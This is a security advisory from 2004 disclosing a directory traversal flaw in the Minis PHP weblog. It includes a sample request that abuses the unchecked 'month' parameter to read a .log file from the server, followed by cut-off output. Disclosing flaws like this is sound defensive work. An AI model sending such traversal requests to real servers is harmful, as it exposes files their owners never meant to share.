-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Title: Minis directory traversal vulnerability Vulnerability discovery: Madelman Date: 31/12/2004 Severity: Moderate Summary: - -------- (from vendor site: http://minis.sourceforge.net/) Minis is a tiny, PHP-powered, text-file based weblogging system. It is easily configured for normal use and it doesnt require any databases, such as MySQL. Also, with some PHP-knowledge youll be able to configure Minis endlessly. Minis doesn't check the month parameter which allows reading any file with .log extension This vulnerability has been tested with Minis 0.2.1 Details: - -------- If we want to read /var/log/XFree86.0.log: REQUEST: http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86.0 RETURNS: (looking at source of HTML) [...] ">
:
:
:
:
:
:
:
:
:
:
: